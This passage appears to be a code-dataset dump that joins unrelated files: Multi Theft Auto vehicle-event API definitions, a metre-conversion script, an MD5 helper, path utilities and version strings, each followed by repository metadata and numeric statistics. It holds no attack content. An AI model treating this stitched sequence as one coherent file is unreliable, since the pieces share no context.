names=['vehicle'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientVehicleCollision',
docs=FunctionDoc(
description='This event is triggered when a vehicle collides with an element or a world object.\nNote that the collision reported by this event doesnt always damage the vehicle by default (this event triggers when hitting lamp posts, but the vehicle isnt damaged by them automatically, for example). If you want to deal with real damage, please refer to onClientVehicleDamage.' ,
arguments={
"theHitElement": """the other entity, or nil if the vehicle collided with the world """,
"damageImpulseMag": """the impact magnitude (Note: this is NOT the damage it is a force value which is then multiplied by the vehicles collision damage multiplier. for an example of this see below) """,
"bodyPart": """the bodypart that hit the other element """,
"collisionX/Y/Z": """the position the collision took place """,
"normalX/Y/Z": """the surface normal of the hit object """,
"hitElementforce": """0 for non vehicles or the force of the other vehicle """,
"model": """model of the hit element (useful to detect building collisions as hitElement will be nil) """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theHitElement',
argument_type=FunctionType(
names=['element'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='damageImpulseMag',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='bodypart',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='collisionX',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='collisionY',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='collisionZ',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='normalX',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='normalY',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='normalZ',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='hitElementForce',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='model',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientVehicleDamage',
docs=FunctionDoc(
description='This event is triggered when a vehicle is damaged.' ,
arguments={
"theAttacker": """: An element if there was an attacker. """,
"theWeapon": """: An integer specifying the Weapons|weapon ID if a weapon was used. Otherwise Damage Types|Damage Type ID is used. """,
"loss": """: A float representing the amount of damage taken. """,
"damagePosX": """: A float representing the X co-ordinate of where the damage took place. """,
"damagePosY": """: A float representing the Y co-ordinate of where the damage took place. """,
"damagePosZ": """: A float representing the Z co-ordinate of where the damage took place. """,
"tireID": """: A number representing the tire which took damage, if there is one. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theAttacker',
argument_type=FunctionType(
names=['element'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='theWeapon',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='loss',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='damagePosX',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='damagePosY',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='damagePosZ',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='tireID',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientVehicleEnter',
docs=FunctionDoc(
description='This event gets fired when a player or ped enters a vehicle.' ,
arguments={
"thePed": """the player or ped that entered the vehicle """,
"seat": """the number of the seat that the ped is now sitting on. 0 = driver, higher numbers are passenger seats. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='thePed',
argument_type=FunctionType(
names=['ped'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='seat',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientVehicleExit',
docs=FunctionDoc(
description='This event gets fired when a ped or player gets out of a vehicle.' ,
arguments={
"thePed": """the player or ped element that exited the vehicle """,
"seat": """the number of the seat that the player was sitting on. 0 = driver, higher numbers are passenger seats. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='thePed',
argument_type=FunctionType(
names=['ped'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='seat',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientVehicleExplode',
docs=FunctionDoc(
description='This event is triggered when a vehicle explodes.' ,
arguments={
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientVehicleNitroStateChange',
docs=FunctionDoc(
description='This event gets triggered when nitro state is changing.' ,
arguments={
"state": """current state of nitro """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='state',
argument_type=FunctionType(
names=['bool'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientVehicleRespawn',
docs=FunctionDoc(
description='This event is triggered when a vehicle respawns.' ,
arguments={
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientVehicleStartEnter',
docs=FunctionDoc(
description='This event is triggered when a ped or player starts entering a vehicle. Once the entering animation completes, onClientVehicleEnter is triggered.' ,
arguments={
"thePed": """the ped that just started entering a vehicle. """,
"seat": """the number of the seat he is going to sit on. """,
"door": """An integer of which door the ped used (0-3). 0 is driver side door, 1 is front passenger, 2 is back left, 3 is back right. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='thePed',
argument_type=FunctionType(
names=['ped'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='seat',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='door',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientVehicleStartExit',
docs=FunctionDoc(
description='This event is triggered when a ped or player starts exiting a vehicle. Once the exiting animation completes, onClientVehicleExit is triggered.' ,
arguments={
"thePed": """the ped who started exiting the vehicle. """,
"seat": """the number of the seat that the ped was sitting on. """,
"door": """the number of the door that the ped is using to leave. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='thePed',
argument_type=FunctionType(
names=['ped'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='seat',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='door',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientVehicleWeaponHit',
docs=FunctionDoc(
description='This event is called when a vehicle weapon hits an element or the world.' ,
arguments={
"weaponType": """: The type of vehicle weapon. (See the list below) """,
"hitElement": """: The vehicle, ped or player that was hit by the weapon sometimes false. """,
"hitX": """: The X world co-ordinate of where the hit occured. """,
"hitY": """: The Y world co-ordinate of where the hit occured. """,
"hitZ": """: The Z world co-ordinate of where the hit occured. """,
"model": """: The model ID of the element that was hit. """,
"materialID": """: The material ID of the element that was hit. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='weaponType',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='hitElement',
argument_type=FunctionType(
names=['element'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='hitX',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='hitY',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='hitZ',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='model',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='materialID',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
EventData(
name='onTrailerAttach',
docs=FunctionDoc(
description='This event is triggered when a trailer is attached to a truck or when a tow truck hooks on to a vehicle.' ,
arguments={
"theTruck": """: the truck vehicle that got attached to this trailer. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theTruck',
argument_type=FunctionType(
names=['vehicle'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
client=[
],
),
CompoundEventData(
server=[
EventData(
name='onTrailerDetach',
docs=FunctionDoc(
description='This event is triggered when a trailer is detached from a truck.' ,
arguments={
"theTruck": """: the truck vehicle that this trailer got detached from. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theTruck',
argument_type=FunctionType(
names=['vehicle'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
client=[
],
),
CompoundEventData(
server=[
EventData(
name='onVehicleDamage',
docs=FunctionDoc(
description='This event is triggered when a vehicle is damaged. If you want to get the attacker you can use onClientVehicleDamage.' ,
arguments={
"loss": """: a float representing the amount of health the vehicle lost. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='loss',
argument_type=FunctionType(
names=['float'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
client=[
],
),
CompoundEventData(
server=[
EventData(
name='onVehicleEnter',
docs=FunctionDoc(
description='This event is triggered when a player or ped enters a vehicle.' ,
arguments={
"thePed": """: a player or ped element who is entering the vehicle. """,
"seat": """: an int representing the seat in which the ped is entering. Seat 0 is the drivers seat. """,
"jacked": """: a player or ped element representing who has been jacked. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='thePed',
argument_type=FunctionType(
names=['ped'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='seat',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='jacked',
argument_type=FunctionType(
names=['player'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
client=[
],
),
CompoundEventData(
server=[
EventData(
name='onVehicleExit',
docs=FunctionDoc(
description='This event is triggered when a player or ped leaves a vehicle.' ,
arguments={
"thePed": """: a player or ped element who exited the vehicle. """,
"seat": """: an int representing the seat in which the ped exited from. """,
"jacker": """: a player or ped element who jacked the driver. """,
"forcedByScript": """a boolean representing whether the exit was forced using removePedFromVehicle or by the ped/player. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='thePed',
argument_type=FunctionType(
names=['ped'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='seat',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='jacker',
argument_type=FunctionType(
names=['ped'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='forcedByScript',
argument_type=FunctionType(
names=['bool'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
client=[
],
),
CompoundEventData(
server=[
EventData(
name='onVehicleExplode',
docs=FunctionDoc(
description='This event is triggered when a vehicle explodes.' ,
arguments={
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
],
variable_length=False,
),
)
],
client=[
],
),
CompoundEventData(
server=[
EventData(
name='onVehicleRespawn',
docs=FunctionDoc(
description='This event is triggered when a vehicle is respawned due. See toggleVehicleRespawn.' ,
arguments={
"exploded": """: true if this vehicle respawned because it exploded, false if it respawned due to being deserted. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='exploded',
argument_type=FunctionType(
names=['bool'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
client=[
],
),
CompoundEventData(
server=[
EventData(
name='onVehicleStartEnter',
docs=FunctionDoc(
description='This event is triggered when a player or ped starts to enter a vehicle. This event can be used to cancel entry, if necessary.' ,
arguments={
"enteringPed": """: a player or ped element who is starting to enter a vehicle. """,
"seat": """: an int representing the seat in which the ped is entering. """,
"jacked": """: a player or ped element representing who is going to be jacked. """,
"door": """: an int of which door is being used (0-3). 0 is driver side door, 1 is front passenger, 2 is back left, 3 is back right. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='enteringPed',
argument_type=FunctionType(
names=['ped'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='seat',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='jacked',
argument_type=FunctionType(
names=['ped'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
client=[
],
),
CompoundEventData(
server=[
EventData(
name='onVehicleStartExit',
docs=FunctionDoc(
description='This event is triggered when a player or ped starts to exit a vehicle. This event can be used to cancel exit, if necessary.' ,
arguments={
"exitingPed": """: a player or ped element who is starting to exit a vehicle. """,
"seat": """: an int representing the seat in which the ped is exiting from. """,
"jacked": """: a player or ped element representing who is jacking. """,
"door": """: an int representing the door that the ped is using to leave. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='exitingPed',
argument_type=FunctionType(
names=['ped'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='seat',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='jacked',
argument_type=FunctionType(
names=['ped'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='door',
argument_type=FunctionType(
names=['int'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
client=[
],
)
]
| 39.418453 | 395 | 0.320692 | 2,196 | 42,296 | 6.089709 | 0.12796 | 0.083751 | 0.100501 | 0.121439 | 0.753458 | 0.749495 | 0.703881 | 0.682644 | 0.656995 | 0.63359 | 0 | 0.000974 | 0.611547 | 42,296 | 1,072 | 396 | 39.455224 | 0.812964 | 0.001206 | 0 | 0.707574 | 1 | 0.012464 | 0.161991 | 0.007102 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.003835 | 0.000959 | 0 | 0.000959 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ce94c0ff175d2ca8e40fab028ebdbeb133b6f2f2 | 301 | py | Python | curso em video - Phython/desafios/desafio 8.py | ThyagoHiggins/LP-Phython | 78e84aa77e786cc33b7d91397d17e93c3d5a692a | [
"MIT"
] | null | null | null | curso em video - Phython/desafios/desafio 8.py | ThyagoHiggins/LP-Phython | 78e84aa77e786cc33b7d91397d17e93c3d5a692a | [
"MIT"
] | null | null | null | curso em video - Phython/desafios/desafio 8.py | ThyagoHiggins/LP-Phython | 78e84aa77e786cc33b7d91397d17e93c3d5a692a | [
"MIT"
] | null | null | null | m= float(input('Informe o valor em metros: '))
print(f'O valor em Km é: {m/1000}')
print(f'O valor em Hm é: {m/100}')
print(f'O valor em dam é: {m/10}')
print(f'O valor em M é: {m}')
print(f'O valor em dm é: {m*10:.0f}')
print(f'O valor em cm é: {m*100:.0f}')
print(f'O valor em mm é: {m*1000:.0f}') | 33.444444 | 47 | 0.604651 | 73 | 301 | 2.493151 | 0.287671 | 0.263736 | 0.351648 | 0.461538 | 0.56044 | 0.175824 | 0 | 0 | 0 | 0 | 0 | 0.083665 | 0.166113 | 301 | 9 | 48 | 33.444444 | 0.641434 | 0 | 0 | 0 | 0 | 0 | 0.675497 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.875 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
ceb86bfb9a4787c6efe8af84a83b56fe902faba3 | 100 | py | Python | taggo/metadata/40_md5.py | xeor/taggo | 130d5229cd8c95628cfbe25297cd14338b31aa59 | [
"MIT"
] | 14 | 2017-03-28T17:01:55.000Z | 2021-07-07T19:53:51.000Z | taggo/metadata/40_md5.py | xeor/taggo | 130d5229cd8c95628cfbe25297cd14338b31aa59 | [
"MIT"
] | 23 | 2017-10-07T19:31:57.000Z | 2021-04-28T10:52:43.000Z | taggo/metadata/40_md5.py | xeor/taggo | 130d5229cd8c95628cfbe25297cd14338b31aa59 | [
"MIT"
] | 2 | 2017-06-08T16:09:14.000Z | 2019-04-03T08:21:05.000Z | import hashlib
def run(filepath):
return hashlib.md5(open(filepath, 'rb').read()).hexdigest()
| 16.666667 | 63 | 0.7 | 13 | 100 | 5.384615 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011494 | 0.13 | 100 | 5 | 64 | 20 | 0.793103 | 0 | 0 | 0 | 0 | 0 | 0.02 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
cece2e23c24dbe06c4a801d80200295ed98bbab9 | 161 | py | Python | surfactant_example/data/gromacs_files/path.py | force-h2020/force-bdss-plugin-surfactant-example | ba442f2b39919f7d071f4384f8eaba0d99f44b1f | [
"BSD-2-Clause",
"MIT"
] | null | null | null | surfactant_example/data/gromacs_files/path.py | force-h2020/force-bdss-plugin-surfactant-example | ba442f2b39919f7d071f4384f8eaba0d99f44b1f | [
"BSD-2-Clause",
"MIT"
] | null | null | null | surfactant_example/data/gromacs_files/path.py | force-h2020/force-bdss-plugin-surfactant-example | ba442f2b39919f7d071f4384f8eaba0d99f44b1f | [
"BSD-2-Clause",
"MIT"
] | null | null | null | from os.path import join, dirname, abspath
def get_file(filename):
return join(dirpath(), filename)
def dirpath():
return dirname(abspath(__file__))
| 16.1 | 42 | 0.720497 | 21 | 161 | 5.285714 | 0.619048 | 0.252252 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.167702 | 161 | 9 | 43 | 17.888889 | 0.828358 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0.2 | 0.4 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
cecfd72ea34cc07e1376e2d0f8c365436868a07c | 29 | py | Python | inner.py | iorobertob/test-inner | 717ee425d330e40f93bc2544eb76d0a864ba948a | [
"MIT"
] | null | null | null | inner.py | iorobertob/test-inner | 717ee425d330e40f93bc2544eb76d0a864ba948a | [
"MIT"
] | null | null | null | inner.py | iorobertob/test-inner | 717ee425d330e40f93bc2544eb76d0a864ba948a | [
"MIT"
] | null | null | null | print 'inner labas modified'
| 14.5 | 28 | 0.793103 | 4 | 29 | 5.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 29 | 1 | 29 | 29 | 0.92 | 0 | 0 | 0 | 0 | 0 | 0.689655 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
ced273cfb651965a266dc11798e9a3b3fabccd18 | 298 | py | Python | ocs_sample_library_preview/Community/__init__.py | osisoft/sample-ocs-sample_libraries-python | 03e7b76f051643cb09eaa61342c9200034bb5266 | [
"Apache-2.0"
] | 4 | 2021-04-13T12:24:50.000Z | 2022-01-14T14:03:11.000Z | ocs_sample_library_preview/Community/__init__.py | osisoft/sample-ocs-sample_libraries-python | 03e7b76f051643cb09eaa61342c9200034bb5266 | [
"Apache-2.0"
] | 17 | 2021-03-09T22:04:13.000Z | 2022-03-24T17:08:29.000Z | ocs_sample_library_preview/Community/__init__.py | osisoft/sample-ocs-sample_libraries-python | 03e7b76f051643cb09eaa61342c9200034bb5266 | [
"Apache-2.0"
] | 2 | 2021-05-10T22:39:24.000Z | 2022-02-03T05:36:51.000Z | from .Community import Community
from .CommunityInput import CommunityInput
from .CommunitySummaryInformation import CommunitySummaryInformation
from .CommunityTenant import CommunityTenant
from .CommunityTenantStatus import CommunityTenantStatus
from .StreamSearchResult import StreamSearchResult
| 42.571429 | 68 | 0.899329 | 24 | 298 | 11.166667 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.080537 | 298 | 6 | 69 | 49.666667 | 0.978102 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ced6ddd77a8c03acde68196af88253396e529792 | 48 | py | Python | component/tiles/__init__.py | ingdanielguerrero/SMFM_biota | 01582d4291d43488d108a9789db2f2dbe75e43ce | [
"MIT"
] | null | null | null | component/tiles/__init__.py | ingdanielguerrero/SMFM_biota | 01582d4291d43488d108a9789db2f2dbe75e43ce | [
"MIT"
] | 11 | 2021-06-07T17:22:42.000Z | 2021-12-06T18:43:03.000Z | component/tiles/__init__.py | ingdanielguerrero/SMFM_biota | 01582d4291d43488d108a9789db2f2dbe75e43ce | [
"MIT"
] | 3 | 2021-03-12T07:26:17.000Z | 2021-04-12T12:46:37.000Z | from .parameters import *
from .process import * | 24 | 25 | 0.770833 | 6 | 48 | 6.166667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145833 | 48 | 2 | 26 | 24 | 0.902439 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0c6a6241367ae8af55704fec041deee4807a77d0 | 129 | py | Python | Standup.py | LuisAhumada/standup | df7a434d8a55f3015a05dbd4fc1ad06538dcb8c0 | [
"MIT"
] | null | null | null | Standup.py | LuisAhumada/standup | df7a434d8a55f3015a05dbd4fc1ad06538dcb8c0 | [
"MIT"
] | null | null | null | Standup.py | LuisAhumada/standup | df7a434d8a55f3015a05dbd4fc1ad06538dcb8c0 | [
"MIT"
] | null | null | null | version https://git-lfs.github.com/spec/v1
oid sha256:aedabb5ed858a6641115e1c397d6e85d066966166683d87fc43855329a19770a
size 2153
| 32.25 | 75 | 0.883721 | 13 | 129 | 8.769231 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.430894 | 0.046512 | 129 | 3 | 76 | 43 | 0.495935 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0ca06da8ffccb4c6c39c2fe1248d2394b0ac2b22 | 186 | py | Python | start.py | Ahsanul08/song_recogniser | 4d6561d926b24967dcc5535bcc10c91dc4ebe0a6 | [
"MIT"
] | 2 | 2019-05-08T02:06:27.000Z | 2020-02-14T08:49:52.000Z | start.py | Ahsanul08/song_recogniser | 4d6561d926b24967dcc5535bcc10c91dc4ebe0a6 | [
"MIT"
] | 4 | 2021-06-08T19:03:29.000Z | 2022-01-13T00:43:20.000Z | start.py | Ahsanul08/song_recogniser | 4d6561d926b24967dcc5535bcc10c91dc4ebe0a6 | [
"MIT"
] | 1 | 2022-01-05T16:16:43.000Z | 2022-01-05T16:16:43.000Z | from config import djv, database_directory
def create_initial_database():
djv.fingerprint_directory(database_directory, [".mp3"])
print("Finished saving data to database :)")
| 23.25 | 59 | 0.758065 | 22 | 186 | 6.181818 | 0.727273 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00625 | 0.139785 | 186 | 7 | 60 | 26.571429 | 0.84375 | 0 | 0 | 0 | 0 | 0 | 0.210811 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0 | 0.5 | 0.5 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
0ca5c8d5934256d4306654be0d21fa21b4c21e62 | 44 | py | Python | simfempy/applications/__init__.py | anairabeze/simfempy | 144362956263cb9b81f4bade15664d9cc640f93a | [
"MIT"
] | null | null | null | simfempy/applications/__init__.py | anairabeze/simfempy | 144362956263cb9b81f4bade15664d9cc640f93a | [
"MIT"
] | 3 | 2018-12-18T16:36:52.000Z | 2019-01-29T18:34:55.000Z | simfempy/applications/__init__.py | beckerrh/fempy | dd7214ea7f6d81a5200fcb4a91f07a5cd3322e9e | [
"MIT"
] | 1 | 2021-06-09T15:49:51.000Z | 2021-06-09T15:49:51.000Z | from . import application, heat, elasticity
| 22 | 43 | 0.795455 | 5 | 44 | 7 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.136364 | 44 | 1 | 44 | 44 | 0.921053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0b8072327a0c0f35a50e64c2824a5483c2161bf0 | 113 | py | Python | lib_repo/SigProfPlot/sigProfilerPlotting/version.py | lgpdv/sigmut | cdee379bd31af69995b72427658fc0448bf56745 | [
"BSD-2-Clause"
] | null | null | null | lib_repo/SigProfPlot/sigProfilerPlotting/version.py | lgpdv/sigmut | cdee379bd31af69995b72427658fc0448bf56745 | [
"BSD-2-Clause"
] | null | null | null | lib_repo/SigProfPlot/sigProfilerPlotting/version.py | lgpdv/sigmut | cdee379bd31af69995b72427658fc0448bf56745 | [
"BSD-2-Clause"
] | 1 | 2020-06-14T17:49:59.000Z | 2020-06-14T17:49:59.000Z |
# THIS FILE IS GENERATED FROM SIGPROFILERPLOTTING SETUP.PY
short_version = '1.0.10'
version = '1.0.10'
